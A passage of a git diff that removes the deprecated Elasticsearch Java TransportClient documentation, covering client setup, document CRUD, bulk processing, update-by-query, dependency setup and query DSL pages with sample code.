9300)) - .addTransportAddress(new TransportAddress(InetAddress.getByName("host2"), 9300)); - -// on shutdown - -client.close(); --------------------------------------------------- - -Note that you have to set the cluster name if you use one different than -"elasticsearch": - -[source,java] --------------------------------------------------- -Settings settings = Settings.builder() - .put("cluster.name", "myClusterName").build(); -TransportClient client = new PreBuiltTransportClient(settings); -//Add transport addresses and do something with the client... --------------------------------------------------- - -The Transport client comes with a cluster sniffing feature which -allows it to dynamically add new hosts and remove old ones. -When sniffing is enabled, the transport client will connect to the nodes in its -internal node list, which is built via calls to `addTransportAddress`. -After this, the client will call the internal cluster state API on those nodes -to discover available data nodes. The internal node list of the client will -be replaced with those data nodes only. This list is refreshed every five seconds by default. -Note that the IP addresses the sniffer connects to are the ones declared as the 'publish' -address in those node's Elasticsearch config. - -Keep in mind that the list might possibly not include the original node it connected to -if that node is not a data node. If, for instance, you initially connect to a -master node, after sniffing, no further requests will go to that master node, -but rather to any data nodes instead. The reason the transport client excludes non-data -nodes is to avoid sending search traffic to master only nodes. - -In order to enable sniffing, set `client.transport.sniff` to `true`: - -[source,java] --------------------------------------------------- -Settings settings = Settings.builder() - .put("client.transport.sniff", true).build(); -TransportClient client = new PreBuiltTransportClient(settings); --------------------------------------------------- - -Other transport client level settings include: - -[cols="<,<",options="header",] -|======================================================================= -|Parameter |Description -|`client.transport.ignore_cluster_name` |Set to `true` to ignore cluster -name validation of connected nodes. (since 0.19.4) - -|`client.transport.ping_timeout` |The time to wait for a ping response -from a node. Defaults to `5s`. - -|`client.transport.nodes_sampler_interval` |How often to sample / ping -the nodes listed and connected. Defaults to `5s`. -|======================================================================= - - -[[client-connected-to-client-node]] -=== Connecting a Client to a Coordinating Only Node - -You can start locally a {ref}/modules-node.html#coordinating-only-node[Coordinating Only Node] -and then simply create a <> in your -application which connects to this Coordinating Only Node. - -This way, the coordinating only node will be able to load whatever plugin you -need (think about discovery plugins for example). diff --git a/docs/java-api/docs.asciidoc b/docs/java-api/docs.asciidoc deleted file mode 100644 index 181c5d8e0bd..00000000000 --- a/docs/java-api/docs.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ -[[java-docs]] -== Document APIs - -This section describes the following CRUD APIs: - -.Single document APIs -* <> -* <> -* <> -* <> - -.Multi-document APIs -* <> -* <> -* <> -* <> -* <> - -NOTE: All CRUD APIs are single-index APIs. The `index` parameter accepts a single -index name, or an `alias` which points to a single index. - -include::docs/index_.asciidoc[] - -include::docs/get.asciidoc[] - -include::docs/delete.asciidoc[] - -include::docs/update.asciidoc[] - -include::docs/multi-get.asciidoc[] - -include::docs/bulk.asciidoc[] - -include::docs/update-by-query.asciidoc[] - -include::docs/reindex.asciidoc[] \ No newline at end of file diff --git a/docs/java-api/docs/bulk.asciidoc b/docs/java-api/docs/bulk.asciidoc deleted file mode 100644 index 9976ba52544..00000000000 --- a/docs/java-api/docs/bulk.asciidoc +++ /dev/null @@ -1,190 +0,0 @@ -[[java-docs-bulk]] -=== Bulk API - -The bulk API allows one to index and delete several documents in a -single request. Here is a sample usage: - -[source,java] --------------------------------------------------- -import static org.elasticsearch.common.xcontent.XContentFactory.*; - -BulkRequestBuilder bulkRequest = client.prepareBulk(); - -// either use client#prepare, or use Requests# to directly build index/delete requests -bulkRequest.add(client.prepareIndex("twitter", "_doc", "1") - .setSource(jsonBuilder() - .startObject() - .field("user", "kimchy") - .field("postDate", new Date()) - .field("message", "trying out Elasticsearch") - .endObject() - ) - ); - -bulkRequest.add(client.prepareIndex("twitter", "_doc", "2") - .setSource(jsonBuilder() - .startObject() - .field("user", "kimchy") - .field("postDate", new Date()) - .field("message", "another post") - .endObject() - ) - ); - -BulkResponse bulkResponse = bulkRequest.get(); -if (bulkResponse.hasFailures()) { - // process failures by iterating through each bulk response item -} --------------------------------------------------- - -[[java-docs-bulk-processor]] -=== Using Bulk Processor - -The `BulkProcessor` class offers a simple interface to flush bulk operations automatically based on the number or size -of requests, or after a given period. - -To use it, first create a `BulkProcessor` instance: - -[source,java] --------------------------------------------------- -import org.elasticsearch.action.bulk.BackoffPolicy; -import org.elasticsearch.action.bulk.BulkProcessor; -import org.elasticsearch.common.unit.ByteSizeUnit; -import org.elasticsearch.common.unit.ByteSizeValue; -import org.elasticsearch.common.unit.TimeValue; - -BulkProcessor bulkProcessor = BulkProcessor.builder( - client, <1> - new BulkProcessor.Listener() { - @Override - public void beforeBulk(long executionId, - BulkRequest request) { ... } <2> - - @Override - public void afterBulk(long executionId, - BulkRequest request, - BulkResponse response) { ... } <3> - - @Override - public void afterBulk(long executionId, - BulkRequest request, - Throwable failure) { ... } <4> - }) - .setBulkActions(10000) <5> - .setBulkSize(new ByteSizeValue(5, ByteSizeUnit.MB)) <6> - .setFlushInterval(TimeValue.timeValueSeconds(5)) <7> - .setConcurrentRequests(1) <8> - .setBackoffPolicy( - BackoffPolicy.exponentialBackoff(TimeValue.timeValueMillis(100), 3)) <9> - .build(); --------------------------------------------------- -<1> Add your Elasticsearch client -<2> This method is called just before bulk is executed. You can for example see the numberOfActions with - `request.numberOfActions()` -<3> This method is called after bulk execution. You can for example check if there was some failing requests - with `response.hasFailures()` -<4> This method is called when the bulk failed and raised a `Throwable` -<5> We want to execute the bulk every 10 000 requests -<6> We want to flush the bulk every 5mb -<7> We want to flush the bulk every 5 seconds whatever the number of requests -<8> Set the number of concurrent requests. A value of 0 means that only a single request will be allowed to be - executed. A value of 1 means 1 concurrent request is allowed to be executed while accumulating new bulk requests. -<9> Set a custom backoff policy which will initially wait for 100ms, increase exponentially and retries up to three - times. A retry is attempted whenever one or more bulk item requests have failed with an `EsRejectedExecutionException` - which indicates that there were too little compute resources available for processing the request. To disable backoff, - pass `BackoffPolicy.noBackoff()`. - -By default, `BulkProcessor`: - -* sets bulkActions to `1000` -* sets bulkSize to `5mb` -* does not set flushInterval -* sets concurrentRequests to 1, which means an asynchronous execution of the flush operation. -* sets backoffPolicy to an exponential backoff with 8 retries and a start delay of 50ms. The total wait time is roughly 5.1 seconds. - -[[java-docs-bulk-processor-requests]] -==== Add requests - -Then you can simply add your requests to the `BulkProcessor`: - -[source,java] --------------------------------------------------- -bulkProcessor.add(new IndexRequest("twitter", "_doc", "1").source(/* your doc here */)); -bulkProcessor.add(new DeleteRequest("twitter", "_doc", "2")); --------------------------------------------------- - -[[java-docs-bulk-processor-close]] -==== Closing the Bulk Processor - -When all documents are loaded to the `BulkProcessor` it can be closed by using `awaitClose` or `close` methods: - -[source,java] --------------------------------------------------- -bulkProcessor.awaitClose(10, TimeUnit.MINUTES); --------------------------------------------------- - -or - -[source,java] --------------------------------------------------- -bulkProcessor.close(); --------------------------------------------------- - -Both methods flush any remaining documents and disable all other scheduled flushes, if they were scheduled by setting -`flushInterval`. If concurrent requests were enabled, the `awaitClose` method waits for up to the specified timeout for -all bulk requests to complete then returns `true`; if the specified waiting time elapses before all bulk requests complete, -`false` is returned. The `close` method doesn't wait for any remaining bulk requests to complete and exits immediately. - -[[java-docs-bulk-processor-tests]] -==== Using Bulk Processor in tests - -If you are running tests with Elasticsearch and are using the `BulkProcessor` to populate your dataset -you should better set the number of concurrent requests to `0` so the flush operation of the bulk will be executed -in a synchronous manner: - -[source,java] --------------------------------------------------- -BulkProcessor bulkProcessor = BulkProcessor.builder(client, new BulkProcessor.Listener() { /* Listener methods */ }) - .setBulkActions(10000) - .setConcurrentRequests(0) - .build(); - -// Add your requests -bulkProcessor.add(/* Your requests */); - -// Flush any remaining requests -bulkProcessor.flush(); - -// Or close the bulkProcessor if you don't need it anymore -bulkProcessor.close(); - -// Refresh your indices -client.admin().indices().prepareRefresh().get(); - -// Now you can start searching! -client.prepareSearch().get(); --------------------------------------------------- - - -[[java-docs-bulk-global-parameters]] -==== Global Parameters - -Global parameters can be specified on the BulkRequest as well as BulkProcessor, similar to the REST API. These global - parameters serve as defaults and can be overridden by local parameters specified on each sub request. Some parameters - have to be set before any sub request is added - index, type - and you have to specify them during BulkRequest or - BulkProcessor creation. Some are optional - pipeline, routing - and can be specified at any point before the bulk is sent. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{hlrc-tests}/BulkProcessorIT.java[bulk-processor-mix-parameters] --------------------------------------------------- -<1> global parameters from the BulkRequest will be applied on a sub request -<2> local pipeline parameter on a sub request will override global parameters from BulkRequest - - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{hlrc-tests}/BulkRequestWithGlobalParametersIT.java[bulk-request-mix-pipeline] --------------------------------------------------- -<1> local pipeline parameter on a sub request will override global pipeline from the BulkRequest -<2> global parameter from the BulkRequest will be applied on a sub request diff --git a/docs/java-api/docs/delete.asciidoc b/docs/java-api/docs/delete.asciidoc deleted file mode 100644 index 004edc84b3d..00000000000 --- a/docs/java-api/docs/delete.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ -[[java-docs-delete]] -=== Delete API - -The delete API allows one to delete a typed JSON document from a specific -index based on its id. The following example deletes the JSON document -from an index called twitter, under a type called `_doc`, with id valued -1: - -[source,java] --------------------------------------------------- -DeleteResponse response = client.prepareDelete("twitter", "_doc", "1").get(); --------------------------------------------------- - -For more information on the delete operation, check out the -{ref}/docs-delete.html[delete API] docs. - -[[java-docs-delete-by-query]] -=== Delete By Query API - -The delete by query API allows one to delete a given set of documents based on -the result of a query: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[delete-by-query-sync] --------------------------------------------------- -<1> query -<2> index -<3> execute the operation -<4> number of deleted documents - -As it can be a long running operation, if you wish to do it asynchronously, you can call `execute` instead of `get` -and provide a listener like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[delete-by-query-async] --------------------------------------------------- -<1> query -<2> index -<3> listener -<4> number of deleted documents diff --git a/docs/java-api/docs/get.asciidoc b/docs/java-api/docs/get.asciidoc deleted file mode 100644 index 03c642cbac8..00000000000 --- a/docs/java-api/docs/get.asciidoc +++ /dev/null @@ -1,14 +0,0 @@ -[[java-docs-get]] -=== Get API - -The get API allows to get a typed JSON document from the index based on -its id. The following example gets a JSON document from an index called -twitter, under a type called `_doc`, with id valued 1: - -[source,java] --------------------------------------------------- -GetResponse response = client.prepareGet("twitter", "_doc", "1").get(); --------------------------------------------------- - -For more information on the get operation, check out the REST -{ref}/docs-get.html[get] docs. diff --git a/docs/java-api/docs/index_.asciidoc b/docs/java-api/docs/index_.asciidoc deleted file mode 100644 index 694a29beba0..00000000000 --- a/docs/java-api/docs/index_.asciidoc +++ /dev/null @@ -1,167 +0,0 @@ -[[java-docs-index]] -=== Index API - -The index API allows one to index a typed JSON document into a specific -index and make it searchable. - - -[[java-docs-index-generate]] -==== Generate JSON document - -There are several different ways of generating a JSON document: - -* Manually (aka do it yourself) using native `byte[]` or as a `String` - -* Using a `Map` that will be automatically converted to its JSON -equivalent - -* Using a third party library to serialize your beans such as -https://github.com/FasterXML/jackson[Jackson] - -* Using built-in helpers XContentFactory.jsonBuilder() - -Internally, each type is converted to `byte[]` (so a String is converted -to a `byte[]`). Therefore, if the object is in this form already, then -use it. The `jsonBuilder` is highly optimized JSON generator that -directly constructs a `byte[]`. - - -[[java-docs-index-generate-diy]] -===== Do It Yourself - -Nothing really difficult here but note that you will have to encode -dates according to the -{ref}/mapping-date-format.html[Date Format]. - -[source,java] --------------------------------------------------- -String json = "{" + - "\"user\":\"kimchy\"," + - "\"postDate\":\"2013-01-30\"," + - "\"message\":\"trying out Elasticsearch\"" + - "}"; --------------------------------------------------- - - -[[java-docs-index-generate-using-map]] -===== Using Map - -Map is a key:values pair collection. It represents a JSON structure: - -[source,java] --------------------------------------------------- -Map json = new HashMap(); -json.put("user","kimchy"); -json.put("postDate",new Date()); -json.put("message","trying out Elasticsearch"); --------------------------------------------------- - - -[[java-docs-index-generate-beans]] -===== Serialize your beans - -You can use https://github.com/FasterXML/jackson[Jackson] to serialize -your beans to JSON. Please add http://search.maven.org/#search%7Cga%7C1%7Cjackson-databind[Jackson Databind] - to your project. Then you can use `ObjectMapper` to serialize your beans: - -[source,java] --------------------------------------------------- -import com.fasterxml.jackson.databind.*; - -// instance a json mapper -ObjectMapper mapper = new ObjectMapper(); // create once, reuse - -// generate json -byte[] json = mapper.writeValueAsBytes(yourbeaninstance); --------------------------------------------------- - - -[[java-docs-index-generate-helpers]] -===== Use Elasticsearch helpers - -Elasticsearch provides built-in helpers to generate JSON content. - -[source,java] --------------------------------------------------- -import static org.elasticsearch.common.xcontent.XContentFactory.*; - -XContentBuilder builder = jsonBuilder() - .startObject() - .field("user", "kimchy") - .field("postDate", new Date()) - .field("message", "trying out Elasticsearch") - .endObject() --------------------------------------------------- - -Note that you can also add arrays with `startArray(String)` and -`endArray()` methods. By the way, the `field` method + - accepts many object types. You can directly pass numbers, dates and even -other XContentBuilder objects. - -If you need to see the generated JSON content, you can use the -`Strings.toString()` method. - -[source,java] --------------------------------------------------- -import org.elasticsearch.common.Strings; - -String json = Strings.toString(builder); --------------------------------------------------- - - -[[java-docs-index-doc]] -==== Index document - -The following example indexes a JSON document into an index called -twitter, under a type called `_doc`, with id valued 1: - -[source,java] --------------------------------------------------- -import static org.elasticsearch.common.xcontent.XContentFactory.*; - -IndexResponse response = client.prepareIndex("twitter", "_doc", "1") - .setSource(jsonBuilder() - .startObject() - .field("user", "kimchy") - .field("postDate", new Date()) - .field("message", "trying out Elasticsearch") - .endObject() - ) - .get(); --------------------------------------------------- - -Note that you can also index your documents as JSON String and that you -don't have to give an ID: - -[source,java] --------------------------------------------------- -String json = "{" + - "\"user\":\"kimchy\"," + - "\"postDate\":\"2013-01-30\"," + - "\"message\":\"trying out Elasticsearch\"" + - "}"; - -IndexResponse response = client.prepareIndex("twitter", "_doc") -       .setSource(json, XContentType.JSON) - .get(); --------------------------------------------------- - -`IndexResponse` object will give you a report: - -[source,java] --------------------------------------------------- -// Index name -String _index = response.getIndex(); -// Type name -String _type = response.getType(); -// Document ID (generated or not) -String _id = response.getId(); -// Version (if it's the first time you index this document, you will get: 1) -long _version = response.getVersion(); -// status has stored current instance statement. -RestStatus status = response.status(); --------------------------------------------------- - -For more information on the index operation, check out the REST -{ref}/docs-index_.html[index] docs. - diff --git a/docs/java-api/docs/multi-get.asciidoc b/docs/java-api/docs/multi-get.asciidoc deleted file mode 100644 index 8ed2bede292..00000000000 --- a/docs/java-api/docs/multi-get.asciidoc +++ /dev/null @@ -1,30 +0,0 @@ -[[java-docs-multi-get]] -=== Multi Get API - -The multi get API allows to get a list of documents based on their `index` and `id`: - -[source,java] --------------------------------------------------- -MultiGetResponse multiGetItemResponses = client.prepareMultiGet() - .add("twitter", "_doc", "1") <1> - .add("twitter", "_doc", "2", "3", "4") <2> - .add("another", "_doc", "foo") <3> - .get(); - -for (MultiGetItemResponse itemResponse : multiGetItemResponses) { <4> - GetResponse response = itemResponse.getResponse(); - if (response.isExists()) { <5> - String json = response.getSourceAsString(); <6> - } -} --------------------------------------------------- -<1> get by a single id -<2> or by a list of ids for the same index -<3> you can also get from another index -<4> iterate over the result set -<5> you can check if the document exists -<6> access to the `_source` field - -For more information on the multi get operation, check out the REST -{ref}/docs-multi-get.html[multi get] docs. - diff --git a/docs/java-api/docs/reindex.asciidoc b/docs/java-api/docs/reindex.asciidoc deleted file mode 100644 index 842e763f74d..00000000000 --- a/docs/java-api/docs/reindex.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-docs-reindex]] -=== Reindex API - -See {ref}/docs-reindex.html[reindex API]. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[reindex1] --------------------------------------------------- -<1> Optionally a query can provided to filter what documents should be - re-indexed from the source to the target index. diff --git a/docs/java-api/docs/update-by-query.asciidoc b/docs/java-api/docs/update-by-query.asciidoc deleted file mode 100644 index 5a272b8c23c..00000000000 --- a/docs/java-api/docs/update-by-query.asciidoc +++ /dev/null @@ -1,166 +0,0 @@ -[[java-docs-update-by-query]] -=== Update By Query API - -The simplest usage of `updateByQuery` updates each -document in an index without changing the source. This usage enables -picking up a new property or another online mapping change. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query] --------------------------------------------------- - -Calls to the `updateByQuery` API start by getting a snapshot of the index, indexing -any documents found using the `internal` versioning. - -NOTE: Version conflicts happen when a document changes between the time of the -snapshot and the time the index request processes. - -When the versions match, `updateByQuery` updates the document -and increments the version number. - -All update and query failures cause `updateByQuery` to abort. These failures are -available from the `BulkByScrollResponse#getIndexingFailures` method. Any -successful updates remain and are not rolled back. While the first failure -causes the abort, the response contains all of the failures generated by the -failed bulk request. - -To prevent version conflicts from causing `updateByQuery` to abort, set -`abortOnVersionConflict(false)`. The first example does this because it is -trying to pick up an online mapping change and a version conflict means that -the conflicting document was updated between the start of the `updateByQuery` -and the time when it attempted to update the document. This is fine because -that update will have picked up the online mapping update. - -The `UpdateByQueryRequestBuilder` API supports filtering the updated documents, -limiting the total number of documents to update, and updating documents -with a script: - - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-filter] --------------------------------------------------- - -`UpdateByQueryRequestBuilder` also enables direct access to the query used -to select the documents. You can use this access to change the default scroll size or -otherwise modify the request for matching documents. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-size] --------------------------------------------------- - -You can also combine `maxDocs` with sorting to limit the documents updated: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-sort] --------------------------------------------------- - -In addition to changing the `_source` field for the document, you can use a -script to change the action, similar to the Update API: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-script] --------------------------------------------------- - -As in the <>, you can set the value of `ctx.op` to change the -operation that executes: - -`noop`:: - -Set `ctx.op = "noop"` if your script doesn't make any -changes. The `updateByQuery` operation then omits that document from the updates. -This behavior increments the `noop` counter in the response body. - -`delete`:: - -Set `ctx.op = "delete"` if your script decides that the document must be -deleted. The deletion will be reported in the `deleted` counter in the -response body. - -Setting `ctx.op` to any other value generates an error. Setting any -other field in `ctx` generates an error. - -This API doesn't allow you to move the documents it touches, just modify their -source. This is intentional! We've made no provisions for removing the document -from its original location. - -You can also perform these operations on multiple indices at once, similar to the search API: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-multi-index] --------------------------------------------------- - -If you provide a `routing` value then the process copies the routing value to the scroll query, -limiting the process to the shards that match that routing value: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-routing] --------------------------------------------------- - -`updateByQuery` can also use the ingest node by -specifying a `pipeline` like this: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-pipeline] --------------------------------------------------- - -[discrete] -[[java-docs-update-by-query-task-api]] -=== Works with the Task API - -You can fetch the status of all running update-by-query requests with the Task API: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-list-tasks] --------------------------------------------------- - -With the `TaskId` shown above you can look up the task directly: - -// provide API Example -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-get-task] --------------------------------------------------- - -[discrete] -[[java-docs-update-by-query-cancel-task-api]] -=== Works with the Cancel Task API - -Any Update By Query can be canceled using the Task Cancel API: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-cancel-task] --------------------------------------------------- - -Use the `list tasks` API to find the value of `taskId`. - -Cancelling a request is typically a very fast process but can take up to a few seconds. -The task status API continues to list the task until the cancellation is complete. - -[discrete] -[[java-docs-update-by-query-rethrottle]] -=== Rethrottling - -Use the `_rethrottle` API to change the value of `requests_per_second` on a running update: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-reindex-tests}/ReindexDocumentationIT.java[update-by-query-rethrottle] --------------------------------------------------- - -Use the `list tasks` API to find the value of `taskId`. - -As with the `updateByQuery` API, the value of `requests_per_second` -can be any positive float value to set the level of the throttle, or `Float.POSITIVE_INFINITY` to disable throttling. -A value of `requests_per_second` that speeds up the process takes -effect immediately. `requests_per_second` values that slow the query take effect -after completing the current batch in order to prevent scroll timeouts. diff --git a/docs/java-api/docs/update.asciidoc b/docs/java-api/docs/update.asciidoc deleted file mode 100644 index 1c8757c4ba7..00000000000 --- a/docs/java-api/docs/update.asciidoc +++ /dev/null @@ -1,118 +0,0 @@ -[[java-docs-update]] -=== Update API - - -You can either create an `UpdateRequest` and send it to the client: - -[source,java] --------------------------------------------------- -UpdateRequest updateRequest = new UpdateRequest(); -updateRequest.index("index"); -updateRequest.type("_doc"); -updateRequest.id("1"); -updateRequest.doc(jsonBuilder() - .startObject() - .field("gender", "male") - .endObject()); -client.update(updateRequest).get(); --------------------------------------------------- - -Or you can use `prepareUpdate()` method: - -[source,java] --------------------------------------------------- -client.prepareUpdate("ttl", "doc", "1") - .setScript(new Script( - "ctx._source.gender = \"male\"", <1> - ScriptType.INLINE, null, null)) - .get(); - -client.prepareUpdate("ttl", "doc", "1") - .setDoc(jsonBuilder() <2> - .startObject() - .field("gender", "male") - .endObject()) - .get(); --------------------------------------------------- -<1> Your script. It could also be a locally stored script name. -In that case, you'll need to use `ScriptType.FILE`. -<2> Document which will be merged to the existing one. - -Note that you can't provide both `script` and `doc`. - -[[java-docs-update-api-script]] -==== Update by script - -The update API allows to update a document based on a script provided: - -[source,java] --------------------------------------------------- -UpdateRequest updateRequest = new UpdateRequest("ttl", "doc", "1") - .script(new Script("ctx._source.gender = \"male\"")); -client.update(updateRequest).get(); --------------------------------------------------- - - -[[java-docs-update-api-merge-docs]] -==== Update by merging documents - -The update API also support passing a partial document, which will be merged into the existing document (simple -recursive merge, inner merging of objects, replacing core "keys/values" and arrays). For example: - -[source,java] --------------------------------------------------- -UpdateRequest updateRequest = new UpdateRequest("index", "type", "1") - .doc(jsonBuilder() - .startObject() - .field("gender", "male") - .endObject()); -client.update(updateRequest).get(); --------------------------------------------------- - - -[[java-docs-update-api-upsert]] -==== Upsert - -There is also support for `upsert`. If the document does not exist, the content of the `upsert` -element will be used to index the fresh doc: - -[source,java] --------------------------------------------------- -IndexRequest indexRequest = new IndexRequest("index", "type", "1") - .source(jsonBuilder() - .startObject() - .field("name", "Joe Smith") - .field("gender", "male") - .endObject()); -UpdateRequest updateRequest = new UpdateRequest("index", "type", "1") - .doc(jsonBuilder() - .startObject() - .field("name", "Joe Dalton") - .endObject()) - .upsert(indexRequest); <1> -client.update(updateRequest).get(); --------------------------------------------------- -<1> If the document does not exist, the one in `indexRequest` will be added - -If the document `index/_doc/1` already exists, we will have after this operation a document like: - -[source,js] --------------------------------------------------- -{ - "name" : "Joe Dalton", <1> - "gender": "male" -} --------------------------------------------------- -// NOTCONSOLE -<1> This field is updated by the update request - -If it does not exist, we will have a new document: - -[source,js] --------------------------------------------------- -{ - "name" : "Joe Smith", - "gender": "male" -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/java-api/index.asciidoc b/docs/java-api/index.asciidoc deleted file mode 100644 index 9c3b4b68357..00000000000 --- a/docs/java-api/index.asciidoc +++ /dev/null @@ -1,149 +0,0 @@ -= Java API (deprecated) - -include::{elasticsearch-root}/docs/Versions.asciidoc[] - -[[java-api]] -[preface] -== Preface - -deprecated[7.0.0, The `TransportClient` is deprecated in favour of the {java-rest}/java-rest-high.html[Java High Level REST Client] and will be removed in Elasticsearch 8.0. The {java-rest}/java-rest-high-level-migration.html[migration guide] describes all the steps needed to migrate.] - -This section describes the Java API that Elasticsearch provides. All -Elasticsearch operations are executed using a -<> object. All -operations are completely asynchronous in nature (either accepts a -listener, or returns a future). - -Additionally, operations on a client may be accumulated and executed in -<>. - -Note, all the APIs are exposed through the -Java API (actually, the Java API is used internally to execute them). - -== Javadoc - -The javadoc for the transport client can be found at {transport-client-javadoc}/index.html. - -== Maven Repository - -Elasticsearch is hosted on -http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.elasticsearch.client%22[Maven -Central]. - -For example, you can define the latest version in your `pom.xml` file: - -["source","xml",subs="attributes"] --------------------------------------------------- - - org.elasticsearch.client - transport - {version} - --------------------------------------------------- - -[[java-transport-usage-maven-lucene]] -=== Lucene Snapshot repository - -The very first releases of any major version (like a beta), might have been built on top of a Lucene Snapshot version. -In such a case you will be unable to resolve the Lucene dependencies of the client. - -For example, if you want to use the `6.0.0-beta1` version which depends on Lucene `7.0.0-snapshot-00142c9`, you must -define the following repository. - -For Maven: - -["source","xml",subs="attributes"] --------------------------------------------------- - - elastic-lucene-snapshots - Elastic Lucene Snapshots - https://s3.amazonaws.com/download.elasticsearch.org/lucenesnapshots/00142c9 - true - false - --------------------------------------------------- - -For Gradle: - -["source","groovy",subs="attributes"] --------------------------------------------------- -maven { - name "lucene-snapshots" - url 'https://s3.amazonaws.com/download.elasticsearch.org/lucenesnapshots/00142c9' -} --------------------------------------------------- - -=== Log4j 2 Logger - -You need to also include Log4j 2 dependencies: - -["source","xml",subs="attributes"] --------------------------------------------------- - - org.apache.logging.log4j - log4j-core - 2.11.1 - --------------------------------------------------- - -And also provide a Log4j 2 configuration file in your classpath. -For example, you can add in your `src/main/resources` project dir a `log4j2.properties` file like: - - -["source","properties",subs="attributes"] --------------------------------------------------- -appender.console.type = Console -appender.console.name = console -appender.console.layout.type = PatternLayout -appender.console.layout.pattern = [%d{ISO8601}][%-5p][%-25c] %marker%m%n - -rootLogger.level = info -rootLogger.appenderRef.console.ref = console --------------------------------------------------- - -=== Using another Logger - -If you want to use another logger than Log4j 2, you can use http://www.slf4j.org/[SLF4J] bridge to do that: - -["source","xml",subs="attributes"] --------------------------------------------------- - - org.apache.logging.log4j - log4j-to-slf4j - 2.11.1 - - - org.slf4j - slf4j-api - 1.7.24 - --------------------------------------------------- - -http://www.slf4j.org/manual.html[This page] lists implementations you can use. Pick your favorite logger -and add it as a dependency. As an example, we will use the `slf4j-simple` logger: - -["source","xml",subs="attributes"] --------------------------------------------------- - - org.slf4j - slf4j-simple - 1.7.21 - --------------------------------------------------- - -:client-tests: {elasticsearch-root}/server/src/internalClusterTest/java/org/elasticsearch/client/documentation -:hlrc-tests: {elasticsearch-root}/client/rest-high-level/src/test/java/org/elasticsearch/client - -:client-reindex-tests: {elasticsearch-root}/modules/reindex/src/internalClusterTest/java/org/elasticsearch/client/documentation - -include::client.asciidoc[] - -include::docs.asciidoc[] - -include::search.asciidoc[] - -include::aggs.asciidoc[] - -include::query-dsl.asciidoc[] - -include::admin/index.asciidoc[] diff --git a/docs/java-api/query-dsl.asciidoc b/docs/java-api/query-dsl.asciidoc deleted file mode 100644 index 859462e5767..00000000000 --- a/docs/java-api/query-dsl.asciidoc +++ /dev/null @@ -1,40 +0,0 @@ -[[java-query-dsl]] -== Query DSL - -Elasticsearch provides a full Java query dsl in a similar manner to the -REST {ref}/query-dsl.html[Query DSL]. The factory for query -builders is `QueryBuilders`. Once your query is ready, you can use the -<>. - -To use `QueryBuilders` just import them in your class: - -[source,java] --------------------------------------------------- -import static org.elasticsearch.index.query.QueryBuilders.*; --------------------------------------------------- - -Note that you can easily print (aka debug) JSON generated queries using -`toString()` method on `QueryBuilder` object. - -The `QueryBuilder` can then be used with any API that accepts a query, -such as `count` and `search`. - -:query-dsl-test: {elasticsearch-root}/client/rest-high-level/src/test/java/org/elasticsearch/client/documentation/QueryDSLDocumentationTests.java - -include::query-dsl/match-all-query.asciidoc[] - -include::query-dsl/full-text-queries.asciidoc[] - -include::query-dsl/term-level-queries.asciidoc[] - -include::query-dsl/compound-queries.asciidoc[] - -include::query-dsl/joining-queries.asciidoc[] - -include::query-dsl/geo-queries.asciidoc[] - -include::query-dsl/special-queries.asciidoc[] - -include::query-dsl/span-queries.asciidoc[] - -:query-dsl-test!: diff --git a/docs/java-api/query-dsl/bool-query.asciidoc b/docs/java-api/query-dsl/bool-query.asciidoc deleted file mode 100644 index da9ca0ad0cc..00000000000 --- a/docs/java-api/query-dsl/bool-query.asciidoc +++ /dev/null @@ -1,13 +0,0 @@ -[[java-query-dsl-bool-query]] -==== Bool Query - -See {ref}/query-dsl-bool-query.html[Bool Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[bool] --------------------------------------------------- -<1> must query -<2> must not query -<3> should query -<4> a query that must appear in the matching documents but doesn't contribute to scoring. diff --git a/docs/java-api/query-dsl/boosting-query.asciidoc b/docs/java-api/query-dsl/boosting-query.asciidoc deleted file mode 100644 index 2a3c4437d1f..00000000000 --- a/docs/java-api/query-dsl/boosting-query.asciidoc +++ /dev/null @@ -1,12 +0,0 @@ -[[java-query-dsl-boosting-query]] -==== Boosting Query - -See {ref}/query-dsl-boosting-query.html[Boosting Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[boosting] --------------------------------------------------- -<1> query that will promote documents -<2> query that will demote documents -<3> negative boost diff --git a/docs/java-api/query-dsl/common-terms-query.asciidoc b/docs/java-api/query-dsl/common-terms-query.asciidoc 